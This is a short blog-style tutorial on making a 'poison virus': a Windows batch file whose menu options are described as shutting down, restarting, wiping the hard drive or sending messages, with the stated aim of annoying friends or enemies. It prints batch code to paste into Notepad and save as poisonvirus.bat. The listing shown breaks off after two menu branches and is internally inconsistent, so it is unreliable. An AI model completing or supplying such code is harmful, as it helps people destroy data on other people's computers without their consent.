-->

Trick to make a Poison Virus

Learn the Trick to make a simple Virus which would just act like a real poison for the victim computer.


Similar to the poison, there is a Virus which can just act as poison on the Computer with letting you to have only few options to chose from, and all the options would lead to destruction. So the Trick to make a poison virus i.e. virus which would definitely lead to destruction in computer is here. This trick can be used to annoy friends or enemy.



This virus would ask to choose a number between and then do a certain action:
  1. Shutdown.
  2. Restart.
  3. Wipes out your hard drive (beware).
  4. Net send.
  5. Messages then shutdown.
To make this simple virus follow these simple steps: 
  • Open notepad.
  • Copy and paste the following code into notepad: 
@echo off
Title the end of the world
Cd c:\
:menu
Cls
Echo
I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your pc will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc…
Pause
Echo pick your poison:
Echo 1. Die this way (wimp)
Echo 2. Die this way (wimp!)
Echo 3. Do not die this way
Echo 4. Die this way (you’re boring)
Echo 5. Easy way out
Set input=nothing
Set /p input=choice:
If %input%==1 goto one
If %input%==2 goto two
 
  • Save it as poisonvirus.bat.
  • Now it is done.
So it is a simple Trick to make a poison virus.

You may like these posts